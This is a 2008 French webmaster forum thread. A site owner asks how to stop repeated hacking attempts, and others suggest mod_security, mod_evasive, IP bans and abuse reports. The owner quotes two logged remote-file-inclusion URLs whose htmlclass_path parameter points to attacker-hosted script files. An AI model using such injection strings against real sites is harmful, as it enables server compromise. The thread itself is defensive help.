Tentatives de hack de mon site

Comment protéger nos sites web. Discussions, méthodes, les erreurs à ne pas commettre.

Modérateur: Modérateurs

Tentatives de hack de mon site

Messagede ibost » Sam Juin 14, 2008 5:32 am

Bonjour.

Cela fait maintenant plus d'une semaine qu'une personne ou un robot essaie de hacker mon site. Je n'arrête pas de recevoir des notifications d'erreurs 404. L'URL recherché est toujours de la même forme :

Exemples :

1) [RACINE DE MON SITE]/webmaster-phphtml/phphtml.php?htmlclass_path=http://www.geocities.com/dinarisma/new.gif???

2) [RACINE DE MON SITE]/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt?

Savez-vous comment je peux arrêter ces [$^ù$^ù#"&] ???

Merci.
ibost
PR6
PR6
 
Messages: 733
Inscription: Dim Avr 15, 2007 7:15 pm

Publicité

Messagede hawk88 » Sam Juin 14, 2008 8:28 am

Bonjour,

il fait plusieurs attaques à la seconde ?

Comme tu es en dédié il y a le mod_evasive et le mod security qui peuvetn être utile
Carte virtuelle pour anniversaire, mariage et naissance Faire-Part Virtuelle || Pronostics des matchs de foot sur Toufoot.com Pronostics match de Football || Jeu-Arcade.net, plus de 4000 jeux d'arcade Jeux gratuit d'arcade flash
hawk88
PR2
PR2
 
Messages: 286
Inscription: Ven Jan 05, 2007 9:16 pm

Messagede ibost » Sam Juin 14, 2008 8:30 am

Je sais pas ce qu'il essaie de faire mais je pense qu'il croit que j'utilise Joomla...
ibost
PR6
PR6
 
Messages: 733
Inscription: Dim Avr 15, 2007 7:15 pm

Messagede SeO » Sam Juin 14, 2008 9:00 am

Il y a à priori peu de chances que ce genre d'attaque passent, sauf de faire tomber le serveur momentanément par surcharge et encore.

Par précaution, tu peux tout de même essayer de voir quels ip sont utilisées pour ces urls, et s'il n'y en a pas trop, les bannir quelques temps ...

Et si tu es motivé => hack / spam report au fournisseur de l'ip, tu peux trouver les contact par le Whois => http://www.dnsstuff.com/

Un bon mail avec les logs concernés, ça peut avoir quelques conséquences sur l'auteur en fonction du propriétaire de l'ip ;)
SeO
Admin
Admin
 
Messages: 6334
Inscription: Mer Mar 15, 2006 9:41 pm

Messagede ibost » Sam Juin 14, 2008 10:14 am

Hm.... intéressant ! 8)
ibost
PR6
PR6
 
Messages: 733
Inscription: Dim Avr 15, 2007 7:15 pm

Messagede rapha-35 » Sam Juin 14, 2008 4:30 pm

Salut, je ne m'y connais pas trop, mais il exploite une soit disant faille de ton site pour te faire executer ce fichier :http://www.motociclismo.pt/images/Equipa/jpg.txt

Je ne parviens pas a savoir ce qu'il peut faire
rapha-35
 
Messages: 21
Inscription: Ven Mai 16, 2008 4:50 pm

Messagede SeO » Sam Juin 14, 2008 6:22 pm

mm, c'est une collection de petites fonctions pour hacker le serveur, dans le cas ou il y aurai des droits d'exécution dans le dossier.
Si tu as ça, c'est qu'a priori quelqu'un a réussi à le mettre là, si c'est pas toi, il est temps de bien vérifier ton site et ta db, histoire de voir si ce fichier a été utilisé ou pas.
Faudrait aussi restreindre les accès le plus possible au dossier dans le quel ce fichier est apparu.
SeO
Admin
Admin
 
Messages: 6334
Inscription: Mer Mar 15, 2006 9:41 pm

Messagede ibost » Sam Juin 14, 2008 7:36 pm

Je ne connais pas ce fichier ni ce site... d'ailleurs il n'utilise pas seulement ce seul site, ils passent par plein d'autres sites !
ibost
PR6
PR6
 
Messages: 733
Inscription: Dim Avr 15, 2007 7:15 pm

Messagede SeO » Dim Juin 15, 2008 12:38 pm

ibost a écrit:Je ne connais pas ce fichier ni ce site... d'ailleurs il n'utilise pas seulement ce seul site, ils passent par plein d'autres sites !


De quoi tu parles :roll:
SeO
Admin
Admin
 
Messages: 6334
Inscription: Mer Mar 15, 2006 9:41 pm

Messagede ibost » Dim Juin 15, 2008 1:08 pm

Je parle de sites hébergés sous Geocities ou des sites en noms de domaines propres. Enfin bref je vais essayer de bloquer leur IP.

Merci !
ibost
PR6
PR6
 
Messages: 733
Inscription: Dim Avr 15, 2007 7:15 pm


Retourner vers Sécurité informatique

 


  • Articles en relation
    Réponses
    Vus
    Dernier message

Qui est en ligne

Utilisateurs parcourant ce forum: Blekko ScoutJet [Bot] et 8 invités